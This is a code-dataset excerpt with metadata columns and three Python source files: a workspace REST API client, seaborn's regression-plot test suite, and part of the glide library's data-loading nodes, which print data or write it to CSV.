hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k โ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 โ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 โ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k โ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 โ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 โ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k โ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 โ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 โ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42b290f28379044f7898e5789570088ba9add498 | 5,974 | py | Python | pybricks/workspace.py | emthomas/pybricks | adc212cd8d8e9b257be3139aa99116ba2505ead6 | [
"MIT"
] | 2 | 2019-09-21T02:53:09.000Z | 2020-01-03T03:15:39.000Z | pybricks/workspace.py | emthomas/pybricks | adc212cd8d8e9b257be3139aa99116ba2505ead6 | [
"MIT"
] | null | null | null | pybricks/workspace.py | emthomas/pybricks | adc212cd8d8e9b257be3139aa99116ba2505ead6 | [
"MIT"
] | null | null | null | import json
import os
import requests
class WorkspaceApi(object):
    """Thin client for the 2.0 workspace REST API."""

    def __init__(self, hostname, token):
        # Every endpoint lives under <hostname>/api/; requests authenticate
        # with a bearer token carried in the shared header dict.
        self.hostname = "%s/api/" % hostname
        self.__headers = {
            'authorization': "Bearer %s" % token,
            "content-type": "application/scim+json",
            "accept": "application/scim+json",
        }

    def delete(self, path, recursive=False):
        """Delete a workspace object or directory.

        The server responds with RESOURCE_DOES_NOT_EXIST when path is missing,
        and with DIRECTORY_NOT_EMPTY for a non-empty directory unless
        recursive is true. Recursive deletion is not atomic and cannot be
        undone.

        :param path: The absolute path of the notebook or directory. Required.
        :param recursive: Whether to delete directory contents as well.
        :return: Json response
        """
        target = "%s%s" % (self.hostname, "2.0/workspace/delete")
        payload = json.dumps({'path': path, 'recursive': recursive})
        return requests.post(target, headers=self.__headers, data=payload).json()

    def export(self, path, path_format):
        """Export a notebook or the contents of an entire directory.

        Directories can only be exported in DBC format; oversized exports
        fail with MAX_NOTEBOOK_SIZE_EXCEEDED and missing paths with
        RESOURCE_DOES_NOT_EXIST. Libraries are not supported.

        :param path: The absolute path of the notebook or directory. Required.
        :param path_format: One of SOURCE, HTML, JUPYTER, DBC (case sensitive).
        :return: Json response
        """
        target = "%s%s" % (self.hostname, "2.0/workspace/export")
        return requests.get(
            target,
            headers=self.__headers,
            params={'path': path, 'format': path_format},
        ).json()

    def list(self, path, recursive=False):
        """Yield the contents of a directory (or the object itself).

        Missing paths fail with RESOURCE_DOES_NOT_EXIST.

        :param path: The absolute path of the notebook or directory. Required.
        :param recursive: If true, descend into subdirectories as well.
        :return: generator of object dicts
        """
        target = "%s%s" % (self.hostname, "2.0/workspace/list")
        response = requests.get(
            target, params={'path': path}, headers=self.__headers
        ).json()
        if len(response) > 0:
            for item in response['objects']:
                yield item
                if recursive and item['object_type'] == 'DIRECTORY':
                    yield from self.list(item['path'], recursive)

    def get_status(self, path):
        """Return the status of an object or a directory.

        Missing paths fail with RESOURCE_DOES_NOT_EXIST.

        :param path: The absolute path of the notebook or directory. Required.
        :return: Json response
        """
        target = "%s%s" % (self.hostname, "2.0/workspace/get-status")
        return requests.get(
            target, headers=self.__headers, params={'path': path}
        ).json()

    def import_content(self, content, path, language, path_format="SOURCE", overwrite=True):
        """Import a notebook or directory, creating parent dirs first.

        Existing paths fail with RESOURCE_ALREADY_EXISTS unless overwrite is
        true; directories can only be imported in DBC format.

        :param content: The base64-encoded content (10 MB limit).
        :param path: The absolute path of the notebook or directory. Required.
        :param language: Required when path_format is SOURCE; ignored otherwise.
        :param path_format: One of SOURCE, HTML, JUPYTER, DBC (case sensitive).
        :param overwrite: Whether to overwrite an existing object.
        :return: Json response
        """
        target = "%s%s" % (self.hostname, "2.0/workspace/import")
        # Ensure the parent directory exists before importing into it
        self.mkdirs(os.path.dirname(path))
        payload = json.dumps(
            {'content': content, 'path': path, 'language': language,
             'overwrite': overwrite, 'format': path_format})
        return requests.post(target, headers=self.__headers, data=payload).json()

    def mkdirs(self, path):
        """Create the given directory and any missing parent directories.

        :param path: The absolute directory path. Required.
        :return: Json response
        """
        target = "%s%s" % (self.hostname, "2.0/workspace/mkdirs")
        payload = json.dumps({'path': path})
        return requests.post(target, headers=self.__headers, data=payload).json()
| 48.569106 | 333 | 0.647975 |
e0ec1944639ff07a6b0cbfc57042fad21e7d7ad5 | 19,452 | py | Python | seaborn/tests/test_linearmodels.py | darothen/seaborn | 0f43f2f9c84a6c677b7938a3e6edb66bbe9f8f88 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-16T20:43:18.000Z | 2020-05-16T20:43:18.000Z | seaborn/tests/test_linearmodels.py | darothen/seaborn | 0f43f2f9c84a6c677b7938a3e6edb66bbe9f8f88 | [
"MIT",
"BSD-3-Clause"
] | null | null | null | seaborn/tests/test_linearmodels.py | darothen/seaborn | 0f43f2f9c84a6c677b7938a3e6edb66bbe9f8f88 | [
"MIT",
"BSD-3-Clause"
] | 3 | 2019-05-23T14:55:56.000Z | 2021-08-18T19:44:46.000Z | import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import pandas as pd
import nose.tools as nt
import numpy.testing as npt
import pandas.util.testing as pdt
from numpy.testing.decorators import skipif
from nose import SkipTest
try:
import statsmodels.regression.linear_model as smlm
_no_statsmodels = False
except ImportError:
_no_statsmodels = True
from . import PlotTestCase
from .. import linearmodels as lm
from .. import algorithms as algo
from .. import utils
from ..palettes import color_palette
rs = np.random.RandomState(0)
class TestLinearPlotter(PlotTestCase):
    """Tests for the _LinearPlotter variable-handling base class."""

    # Deterministic fixture: a 60-row frame with numeric, discrete, and
    # string columns, plus a copy of y with injected NaNs for dropna tests.
    rs = np.random.RandomState(77)
    df = pd.DataFrame(dict(x=rs.normal(size=60),
                           d=rs.randint(-2, 3, 60),
                           y=rs.gamma(4, size=60),
                           s=np.tile(list("abcdefghij"), 6)))
    df["z"] = df.y + rs.randn(60)
    df["y_na"] = df.y.copy()
    df.loc[[10, 20, 30], 'y_na'] = np.nan

    def test_establish_variables_from_frame(self):
        # Column names resolved against a DataFrame; the frame is retained
        p = lm._LinearPlotter()
        p.establish_variables(self.df, x="x", y="y")
        pdt.assert_series_equal(p.x, self.df.x)
        pdt.assert_series_equal(p.y, self.df.y)
        pdt.assert_frame_equal(p.data, self.df)

    def test_establish_variables_from_series(self):
        # Series passed directly; no backing frame is stored
        p = lm._LinearPlotter()
        p.establish_variables(None, x=self.df.x, y=self.df.y)
        pdt.assert_series_equal(p.x, self.df.x)
        pdt.assert_series_equal(p.y, self.df.y)
        nt.assert_is(p.data, None)

    def test_establish_variables_from_array(self):
        # Plain ndarrays also work; no backing frame is stored
        p = lm._LinearPlotter()
        p.establish_variables(None,
                              x=self.df.x.values,
                              y=self.df.y.values)
        npt.assert_array_equal(p.x, self.df.x)
        npt.assert_array_equal(p.y, self.df.y)
        nt.assert_is(p.data, None)

    def test_establish_variables_from_mix(self):
        # Mixing a column name with an explicit Series is allowed
        p = lm._LinearPlotter()
        p.establish_variables(self.df, x="x", y=self.df.y)
        pdt.assert_series_equal(p.x, self.df.x)
        pdt.assert_series_equal(p.y, self.df.y)
        pdt.assert_frame_equal(p.data, self.df)

    def test_establish_variables_from_bad(self):
        # A column name without a frame to look it up in is an error
        p = lm._LinearPlotter()
        with nt.assert_raises(ValueError):
            p.establish_variables(None, x="x", y=self.df.y)

    def test_dropna(self):
        p = lm._LinearPlotter()
        p.establish_variables(self.df, x="x", y_na="y_na")
        pdt.assert_series_equal(p.x, self.df.x)
        pdt.assert_series_equal(p.y_na, self.df.y_na)

        # dropna should filter every named variable by the shared NaN mask
        p.dropna("x", "y_na")
        mask = self.df.y_na.notnull()
        pdt.assert_series_equal(p.x, self.df.x[mask])
        pdt.assert_series_equal(p.y_na, self.df.y_na[mask])
class TestRegressionPlotter(PlotTestCase):
    """Tests for _RegressionPlotter fitting, binning, and CI machinery."""

    # Deterministic fixtures shared by all tests; grid is the x range the
    # fits are evaluated over and n_boot bounds the bootstrap cost.
    rs = np.random.RandomState(49)

    grid = np.linspace(-3, 3, 30)
    n_boot = 100
    bins_numeric = 3
    bins_given = [-1, 0, 1]

    df = pd.DataFrame(dict(x=rs.normal(size=60),
                           d=rs.randint(-2, 3, 60),
                           y=rs.gamma(4, size=60),
                           s=np.tile(list(range(6)), 10)))
    df["z"] = df.y + rs.randn(60)
    df["y_na"] = df.y.copy()

    # Add within-unit ("s") correlated noise for the units-based CI test
    bw_err = rs.randn(6)[df.s.values] * 2
    df.y += bw_err

    # Binary outcome column "c" whose probability depends on x
    p = 1 / (1 + np.exp(-(df.x * 2 + rs.randn(60))))
    df["c"] = [rs.binomial(1, p_i) for p_i in p]

    df.loc[[10, 20, 30], 'y_na'] = np.nan

    def test_variables_from_frame(self):
        p = lm._RegressionPlotter("x", "y", data=self.df, units="s")
        pdt.assert_series_equal(p.x, self.df.x)
        pdt.assert_series_equal(p.y, self.df.y)
        pdt.assert_series_equal(p.units, self.df.s)
        pdt.assert_frame_equal(p.data, self.df)

    def test_variables_from_series(self):
        p = lm._RegressionPlotter(self.df.x, self.df.y, units=self.df.s)
        npt.assert_array_equal(p.x, self.df.x)
        npt.assert_array_equal(p.y, self.df.y)
        npt.assert_array_equal(p.units, self.df.s)
        nt.assert_is(p.data, None)

    def test_variables_from_mix(self):
        p = lm._RegressionPlotter("x", self.df.y + 1, data=self.df)
        npt.assert_array_equal(p.x, self.df.x)
        npt.assert_array_equal(p.y, self.df.y + 1)
        pdt.assert_frame_equal(p.data, self.df)

    def test_dropna(self):
        # NaNs are dropped by default and retained with dropna=False
        p = lm._RegressionPlotter("x", "y_na", data=self.df)
        nt.assert_equal(len(p.x), pd.notnull(self.df.y_na).sum())

        p = lm._RegressionPlotter("x", "y_na", data=self.df, dropna=False)
        nt.assert_equal(len(p.x), len(self.df.y_na))

    def test_ci(self):
        # x_ci defaults to ci but can be set independently
        p = lm._RegressionPlotter("x", "y", data=self.df, ci=95)
        nt.assert_equal(p.ci, 95)
        nt.assert_equal(p.x_ci, 95)

        p = lm._RegressionPlotter("x", "y", data=self.df, ci=95, x_ci=68)
        nt.assert_equal(p.ci, 95)
        nt.assert_equal(p.x_ci, 68)

    @skipif(_no_statsmodels)
    def test_fast_regression(self):
        p = lm._RegressionPlotter("x", "y", data=self.df, n_boot=self.n_boot)

        # Fit with the "fast" function, which just does linear algebra
        yhat_fast, _ = p.fit_fast(self.grid)

        # Fit using the statsmodels function with an OLS model
        yhat_smod, _ = p.fit_statsmodels(self.grid, smlm.OLS)

        # Compare the vector of y_hat values
        npt.assert_array_almost_equal(yhat_fast, yhat_smod)

    @skipif(_no_statsmodels)
    def test_regress_poly(self):
        p = lm._RegressionPlotter("x", "y", data=self.df, n_boot=self.n_boot)

        # Fit a first-order polynomial
        yhat_poly, _ = p.fit_poly(self.grid, 1)

        # Fit using the statsmodels function with an OLS model
        yhat_smod, _ = p.fit_statsmodels(self.grid, smlm.OLS)

        # Compare the vector of y_hat values
        npt.assert_array_almost_equal(yhat_poly, yhat_smod)

    def test_regress_logx(self):
        x = np.arange(1, 10)
        y = np.arange(1, 10)
        grid = np.linspace(1, 10, 100)
        p = lm._RegressionPlotter(x, y, n_boot=self.n_boot)

        yhat_lin, _ = p.fit_fast(grid)
        yhat_log, _ = p.fit_logx(grid)

        # The log fit should cross the linear fit: below at the start,
        # above in the middle, below again at the end
        nt.assert_greater(yhat_lin[0], yhat_log[0])
        nt.assert_greater(yhat_log[20], yhat_lin[20])
        nt.assert_greater(yhat_lin[90], yhat_log[90])

    @skipif(_no_statsmodels)
    def test_regress_n_boot(self):
        # Each fitting backend should produce n_boot bootstrap curves
        p = lm._RegressionPlotter("x", "y", data=self.df, n_boot=self.n_boot)

        # Fast (linear algebra) version
        _, boots_fast = p.fit_fast(self.grid)
        npt.assert_equal(boots_fast.shape, (self.n_boot, self.grid.size))

        # Slower (np.polyfit) version
        _, boots_poly = p.fit_poly(self.grid, 1)
        npt.assert_equal(boots_poly.shape, (self.n_boot, self.grid.size))

        # Slowest (statsmodels) version
        _, boots_smod = p.fit_statsmodels(self.grid, smlm.OLS)
        npt.assert_equal(boots_smod.shape, (self.n_boot, self.grid.size))

    @skipif(_no_statsmodels)
    def test_regress_without_bootstrap(self):
        # ci=None should disable bootstrapping entirely
        p = lm._RegressionPlotter("x", "y", data=self.df,
                                  n_boot=self.n_boot, ci=None)

        # Fast (linear algebra) version
        _, boots_fast = p.fit_fast(self.grid)
        nt.assert_is(boots_fast, None)

        # Slower (np.polyfit) version
        _, boots_poly = p.fit_poly(self.grid, 1)
        nt.assert_is(boots_poly, None)

        # Slowest (statsmodels) version
        _, boots_smod = p.fit_statsmodels(self.grid, smlm.OLS)
        nt.assert_is(boots_smod, None)

    def test_numeric_bins(self):
        p = lm._RegressionPlotter(self.df.x, self.df.y)
        x_binned, bins = p.bin_predictor(self.bins_numeric)
        npt.assert_equal(len(bins), self.bins_numeric)
        npt.assert_array_equal(np.unique(x_binned), bins)

    def test_provided_bins(self):
        p = lm._RegressionPlotter(self.df.x, self.df.y)
        x_binned, bins = p.bin_predictor(self.bins_given)
        npt.assert_array_equal(np.unique(x_binned), self.bins_given)

    def test_bin_results(self):
        # Bin assignment should partition x into non-overlapping ranges
        p = lm._RegressionPlotter(self.df.x, self.df.y)
        x_binned, bins = p.bin_predictor(self.bins_given)
        nt.assert_greater(self.df.x[x_binned == 0].min(),
                          self.df.x[x_binned == -1].max())
        nt.assert_greater(self.df.x[x_binned == 1].min(),
                          self.df.x[x_binned == 0].max())

    def test_scatter_data(self):
        p = lm._RegressionPlotter(self.df.x, self.df.y)
        x, y = p.scatter_data
        npt.assert_array_equal(x, self.df.x)
        npt.assert_array_equal(y, self.df.y)

        p = lm._RegressionPlotter(self.df.d, self.df.y)
        x, y = p.scatter_data
        npt.assert_array_equal(x, self.df.d)
        npt.assert_array_equal(y, self.df.y)

        # Jitter should perturb the jittered axis within the given bound
        p = lm._RegressionPlotter(self.df.d, self.df.y, x_jitter=.1)
        x, y = p.scatter_data
        nt.assert_true((x != self.df.d).any())
        npt.assert_array_less(np.abs(self.df.d - x), np.repeat(.1, len(x)))
        npt.assert_array_equal(y, self.df.y)

        p = lm._RegressionPlotter(self.df.d, self.df.y, y_jitter=.05)
        x, y = p.scatter_data
        npt.assert_array_equal(x, self.df.d)
        npt.assert_array_less(np.abs(self.df.y - y), np.repeat(.1, len(y)))

    def test_estimate_data(self):
        p = lm._RegressionPlotter(self.df.d, self.df.y, x_estimator=np.mean)

        x, y, ci = p.estimate_data

        npt.assert_array_equal(x, np.sort(np.unique(self.df.d)))
        npt.assert_array_almost_equal(y, self.df.groupby("d").y.mean())
        npt.assert_array_less(np.array(ci)[:, 0], y)
        npt.assert_array_less(y, np.array(ci)[:, 1])

    def test_estimate_cis(self):
        # set known good seed to avoid the test stochastically failing
        np.random.seed(123)

        p = lm._RegressionPlotter(self.df.d, self.df.y,
                                  x_estimator=np.mean, ci=95)
        _, _, ci_big = p.estimate_data

        p = lm._RegressionPlotter(self.df.d, self.df.y,
                                  x_estimator=np.mean, ci=50)
        _, _, ci_wee = p.estimate_data
        npt.assert_array_less(np.diff(ci_wee), np.diff(ci_big))

        p = lm._RegressionPlotter(self.df.d, self.df.y,
                                  x_estimator=np.mean, ci=None)
        _, _, ci_nil = p.estimate_data
        npt.assert_array_equal(ci_nil, [None] * len(ci_nil))

    def test_estimate_units(self):
        # Seed the RNG locally
        np.random.seed(345)

        # Resampling by unit should widen the CIs relative to plain resampling
        p = lm._RegressionPlotter("x", "y", data=self.df,
                                  units="s", x_bins=3)
        _, _, ci_big = p.estimate_data
        ci_big = np.diff(ci_big, axis=1)

        p = lm._RegressionPlotter("x", "y", data=self.df, x_bins=3)
        _, _, ci_wee = p.estimate_data
        ci_wee = np.diff(ci_wee, axis=1)

        npt.assert_array_less(ci_wee, ci_big)

    def test_partial(self):
        # Partialling out a shared confounder should reduce the correlation
        x = self.rs.randn(100)
        y = x + self.rs.randn(100)
        z = x + self.rs.randn(100)

        p = lm._RegressionPlotter(y, z)
        _, r_orig = np.corrcoef(p.x, p.y)[0]

        p = lm._RegressionPlotter(y, z, y_partial=x)
        _, r_semipartial = np.corrcoef(p.x, p.y)[0]
        nt.assert_less(r_semipartial, r_orig)

        p = lm._RegressionPlotter(y, z, x_partial=x, y_partial=x)
        _, r_partial = np.corrcoef(p.x, p.y)[0]
        nt.assert_less(r_partial, r_orig)

    @skipif(_no_statsmodels)
    def test_logistic_regression(self):
        # Logistic predictions must stay strictly inside (0, 1)
        p = lm._RegressionPlotter("x", "c", data=self.df,
                                  logistic=True, n_boot=self.n_boot)
        _, yhat, _ = p.fit_regression(x_range=(-3, 3))
        npt.assert_array_less(yhat, 1)
        npt.assert_array_less(0, yhat)

    @skipif(_no_statsmodels)
    def test_logistic_perfect_separation(self):
        # Perfectly separable data should yield all-NaN predictions,
        # not an exception
        y = self.df.x > self.df.x.mean()
        p = lm._RegressionPlotter("x", y, data=self.df,
                                  logistic=True, n_boot=10)
        _, yhat, _ = p.fit_regression(x_range=(-3, 3))
        nt.assert_true(np.isnan(yhat).all())

    @skipif(_no_statsmodels)
    def test_robust_regression(self):
        p_ols = lm._RegressionPlotter("x", "y", data=self.df,
                                      n_boot=self.n_boot)
        _, ols_yhat, _ = p_ols.fit_regression(x_range=(-3, 3))

        p_robust = lm._RegressionPlotter("x", "y", data=self.df,
                                         robust=True, n_boot=self.n_boot)
        _, robust_yhat, _ = p_robust.fit_regression(x_range=(-3, 3))

        nt.assert_equal(len(ols_yhat), len(robust_yhat))

    @skipif(_no_statsmodels)
    def test_lowess_regression(self):
        # Lowess fits produce no error bands
        p = lm._RegressionPlotter("x", "y", data=self.df, lowess=True)
        grid, yhat, err_bands = p.fit_regression(x_range=(-3, 3))

        nt.assert_equal(len(grid), len(yhat))
        nt.assert_is(err_bands, None)

    def test_regression_options(self):
        # lowess is mutually exclusive with order and logistic
        with nt.assert_raises(ValueError):
            lm._RegressionPlotter("x", "y", data=self.df,
                                  lowess=True, order=2)

        with nt.assert_raises(ValueError):
            lm._RegressionPlotter("x", "y", data=self.df,
                                  lowess=True, logistic=True)

    def test_regression_limits(self):
        # By default the fit grid spans the axes limits; with truncate=True
        # it spans only the data range
        f, ax = plt.subplots()
        ax.scatter(self.df.x, self.df.y)
        p = lm._RegressionPlotter("x", "y", data=self.df)
        grid, _, _ = p.fit_regression(ax)
        xlim = ax.get_xlim()
        nt.assert_equal(grid.min(), xlim[0])
        nt.assert_equal(grid.max(), xlim[1])

        p = lm._RegressionPlotter("x", "y", data=self.df, truncate=True)
        grid, _, _ = p.fit_regression()
        nt.assert_equal(grid.min(), self.df.x.min())
        nt.assert_equal(grid.max(), self.df.x.max())
class TestRegressionPlots(PlotTestCase):
    """Tests for the public regplot/lmplot/residplot plotting interfaces."""

    # Deterministic fixture with faceting columns (g, h) and a unit column (u)
    rs = np.random.RandomState(56)
    df = pd.DataFrame(dict(x=rs.randn(90),
                           y=rs.randn(90) + 5,
                           z=rs.randint(0, 1, 90),
                           g=np.repeat(list("abc"), 30),
                           h=np.tile(list("xy"), 45),
                           u=np.tile(np.arange(6), 15)))
    bw_err = rs.randn(6)[df.u.values]
    df.y += bw_err

    def test_regplot_basic(self):
        # One regression line and two collections (scatter + CI band)
        f, ax = plt.subplots()
        lm.regplot("x", "y", self.df)
        nt.assert_equal(len(ax.lines), 1)
        nt.assert_equal(len(ax.collections), 2)

        x, y = ax.collections[0].get_offsets().T
        npt.assert_array_equal(x, self.df.x)
        npt.assert_array_equal(y, self.df.y)

    def test_regplot_selective(self):
        # scatter/fit_reg/ci flags each remove the corresponding artists
        f, ax = plt.subplots()
        ax = lm.regplot("x", "y", self.df, scatter=False, ax=ax)
        nt.assert_equal(len(ax.lines), 1)
        nt.assert_equal(len(ax.collections), 1)
        ax.clear()

        f, ax = plt.subplots()
        ax = lm.regplot("x", "y", self.df, fit_reg=False)
        nt.assert_equal(len(ax.lines), 0)
        nt.assert_equal(len(ax.collections), 1)
        ax.clear()

        f, ax = plt.subplots()
        ax = lm.regplot("x", "y", self.df, ci=None)
        nt.assert_equal(len(ax.lines), 1)
        nt.assert_equal(len(ax.collections), 1)
        ax.clear()

    def test_regplot_scatter_kws_alpha(self):
        # An RGBA color's alpha channel should be used directly
        f, ax = plt.subplots()
        color = np.array([[0.3, 0.8, 0.5, 0.5]])
        ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color})
        nt.assert_is(ax.collections[0]._alpha, None)
        nt.assert_equal(ax.collections[0]._facecolors[0, 3], 0.5)

        # RGB colors fall back to the default alpha of 0.8
        f, ax = plt.subplots()
        color = np.array([[0.3, 0.8, 0.5]])
        ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color})
        nt.assert_equal(ax.collections[0]._alpha, 0.8)

        # An explicit alpha kwarg wins
        f, ax = plt.subplots()
        color = np.array([[0.3, 0.8, 0.5]])
        ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color,
                                                        'alpha': 0.4})
        nt.assert_equal(ax.collections[0]._alpha, 0.4)

        f, ax = plt.subplots()
        color = 'r'
        ax = lm.regplot("x", "y", self.df, scatter_kws={'color': color})
        nt.assert_equal(ax.collections[0]._alpha, 0.8)

    def test_regplot_binned(self):
        # 5 bins -> regression line plus 5 CI bars
        ax = lm.regplot("x", "y", self.df, x_bins=5)
        nt.assert_equal(len(ax.lines), 6)
        nt.assert_equal(len(ax.collections), 2)

    def test_lmplot_basic(self):
        g = lm.lmplot("x", "y", self.df)
        ax = g.axes[0, 0]
        nt.assert_equal(len(ax.lines), 1)
        nt.assert_equal(len(ax.collections), 2)

        x, y = ax.collections[0].get_offsets().T
        npt.assert_array_equal(x, self.df.x)
        npt.assert_array_equal(y, self.df.y)

    def test_lmplot_hue(self):
        # Two hue levels double the lines and collections
        g = lm.lmplot("x", "y", data=self.df, hue="h")
        ax = g.axes[0, 0]
        nt.assert_equal(len(ax.lines), 2)
        nt.assert_equal(len(ax.collections), 4)

    def test_lmplot_markers(self):
        # A scalar marker is broadcast to all hue levels; a list must match
        g1 = lm.lmplot("x", "y", data=self.df, hue="h", markers="s")
        nt.assert_equal(g1.hue_kws, {"marker": ["s", "s"]})

        g2 = lm.lmplot("x", "y", data=self.df, hue="h", markers=["o", "s"])
        nt.assert_equal(g2.hue_kws, {"marker": ["o", "s"]})

        with nt.assert_raises(ValueError):
            lm.lmplot("x", "y", data=self.df, hue="h", markers=["o", "s", "d"])

    def test_lmplot_marker_linewidths(self):
        # matplotlib 1.4.2 has a known linewidth bug; skip there
        if mpl.__version__ == "1.4.2":
            raise SkipTest

        g = lm.lmplot("x", "y", data=self.df, hue="h",
                      fit_reg=False, markers=["o", "+"])
        c = g.axes[0, 0].collections
        nt.assert_equal(c[0].get_linewidths()[0], 0)
        rclw = mpl.rcParams["lines.linewidth"]
        nt.assert_equal(c[1].get_linewidths()[0], rclw)

    def test_lmplot_facets(self):
        # row x col grid, col_wrap flattening, and hue within columns
        g = lm.lmplot("x", "y", data=self.df, row="g", col="h")
        nt.assert_equal(g.axes.shape, (3, 2))

        g = lm.lmplot("x", "y", data=self.df, col="u", col_wrap=4)
        nt.assert_equal(g.axes.shape, (6,))

        g = lm.lmplot("x", "y", data=self.df, hue="h", col="u")
        nt.assert_equal(g.axes.shape, (1, 6))

    def test_lmplot_hue_col_nolegend(self):
        # Using the same variable for col and hue suppresses the legend
        g = lm.lmplot("x", "y", data=self.df, col="h", hue="h")
        nt.assert_is(g._legend, None)

    def test_lmplot_scatter_kws(self):
        g = lm.lmplot("x", "y", hue="h", data=self.df, ci=None)
        red_scatter, blue_scatter = g.axes[0, 0].collections

        red, blue = color_palette(n_colors=2)
        npt.assert_array_equal(red, red_scatter.get_facecolors()[0, :3])
        npt.assert_array_equal(blue, blue_scatter.get_facecolors()[0, :3])

    def test_residplot(self):
        # Plotted values should be the residuals of a first-order fit
        x, y = self.df.x, self.df.y
        ax = lm.residplot(x, y)

        resid = y - np.polyval(np.polyfit(x, y, 1), x)
        x_plot, y_plot = ax.collections[0].get_offsets().T

        npt.assert_array_equal(x, x_plot)
        npt.assert_array_almost_equal(resid, y_plot)

    @skipif(_no_statsmodels)
    def test_residplot_lowess(self):
        ax = lm.residplot("x", "y", self.df, lowess=True)
        nt.assert_equal(len(ax.lines), 2)

        x, y = ax.lines[1].get_xydata().T
        npt.assert_array_equal(x, np.sort(self.df.x))

    def test_three_point_colors(self):
        # A 3-tuple color must not be confused with three point colors
        x, y = np.random.randn(2, 3)
        ax = lm.regplot(x, y, color=(1, 0, 0))
        color = ax.collections[0].get_facecolors()
        npt.assert_almost_equal(color[0, :3],
                                (1, 0, 0))
| 33.770833 | 79 | 0.587189 |
27fc3f84ea8938d34c14f1510abcffd71d007b60 | 19,214 | py | Python | glide/load.py | LemontechSA/glide | a84ec1b9c8a982430308e8b0a04f84f26200765c | [
"MIT"
] | 19 | 2019-09-09T18:51:26.000Z | 2021-11-23T21:15:37.000Z | glide/load.py | LemontechSA/glide | a84ec1b9c8a982430308e8b0a04f84f26200765c | [
"MIT"
] | null | null | null | glide/load.py | LemontechSA/glide | a84ec1b9c8a982430308e8b0a04f84f26200765c | [
"MIT"
] | 4 | 2019-12-01T22:40:04.000Z | 2022-03-23T18:06:52.000Z | """A home for common data load nodes"""
from copy import deepcopy
import csv
from email.message import EmailMessage
import shutil
import sqlite3
import tempfile
import requests
from tlbx import st, pp, create_email, send_email, sqlformat, repr, format_msg
from glide.core import Node
from glide.flow import SkipFalseNode
from glide.sql import SQLNode
from glide.sql_utils import get_temp_table, add_table_suffix, escape_string
from glide.utils import (
dbg,
warn,
raiseif,
raiseifnot,
size,
save_excel,
find_class_in_dict,
get_class_list_docstring,
open_filepath_or_buffer,
)
class Print(Node):
    """Node that prints the data it receives and pushes it downstream."""

    def print(self, data):
        """Write *data* to stdout."""
        print(data)

    def get_label(self):
        """Return the banner line printed above the data."""
        return "---- %s ----\n" % self.name

    def run(self, data, label=True):
        """Optionally print a label banner, print the data, then push it."""
        prefix = self.get_label() if label else ""
        print(prefix, end="")
        self.print(data)
        self.push(data)
class PrettyPrint(Print):
    """Print node that pretty-prints its output."""

    def print(self, data):
        """Pretty-print *data* with tlbx.pp instead of plain print."""
        pp(data)
class LenPrint(Print):
    """Print node that reports the size of the data instead of its contents."""

    def get_label(self):
        """Use a compact "name: " prefix rather than a banner."""
        return "%s: " % self.name

    def print(self, data):
        """Print the item count of *data* ("n/a" when it has no length)."""
        print("data length: %s" % size(data, "n/a"))
class ReprPrint(Print):
    """Print node that shows an abbreviated (reprlib-style) repr of the data."""

    def print(self, data):
        """Print the size-limited repr of *data*."""
        print(repr(data))
class FormatPrint(Node):
    """Node that runs its data through tlbx.format_msg before printing."""

    def run(
        self,
        data,
        label=None,
        indent=None,
        color=None,
        autocolor=False,
        format_func="pf",
    ):
        """Format *data* with tlbx.format_msg, print the result, and push
        the original data downstream.

        Parameters
        ----------
        data
            The data to format and print
        label : str, optional
            Label passed to format_msg; the special value "node" substitutes
            this node's name
        indent : optional
            Indentation setting forwarded to format_msg
        color : optional
            Color setting forwarded to format_msg
        autocolor : bool, optional
            Auto-color flag forwarded to format_msg
        format_func : str, optional
            Name of the formatting function format_msg should apply
        """
        banner = self.name if label == "node" else label
        rendered = format_msg(
            data,
            label=banner,
            indent=indent,
            color=color,
            autocolor=autocolor,
            format_func=format_func,
        )
        print(rendered)
        self.push(data)
class CSVLoad(SkipFalseNode):
    """Load data into a CSV using csv.DictWriter"""

    def begin(self):
        """Initialize state for CSV writing"""
        # The DictWriter is created lazily on the first batch of rows so the
        # fieldnames can be inferred from the data when not provided.
        self.writer = None

    def run(self, rows, f, push_file=False, dry_run=False, **kwargs):
        """Use DictWriter to output dict rows to a CSV.

        Parameters
        ----------
        rows
            Iterable of dict rows to load to a CSV
        f : file path or buffer
            File to write rows to
        push_file : bool, optional
            If true, push the file forward instead of the data
        dry_run : bool, optional
            If true, skip actually loading the data
        **kwargs
            Keyword arguments passed to csv.DictWriter
        """
        close = False
        fo = f
        if isinstance(f, str):
            # newline="" is required by the csv module when passing it a file
            # object; without it, \r\n platforms get extra blank lines.
            fo = open(f, "w", newline="")
            close = True

        try:
            if dry_run:
                warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
            else:
                if not self.writer:
                    if not kwargs.get("fieldnames", None):
                        try:
                            # Infer the header from the first row's keys
                            kwargs["fieldnames"] = rows[0].keys()
                        except TypeError as e:
                            raise TypeError(
                                "Unable to determine fieldnames from rows. "
                                "Either specify fieldnames or pass subscriptable data rows with keys()."
                            ) from e
                    self.writer = csv.DictWriter(fo, **kwargs)
                    self.writer.writeheader()
                self.writer.writerows(rows)
        finally:
            if close:
                fo.close()

        if push_file:
            self.push(f)
        else:
            self.push(rows)

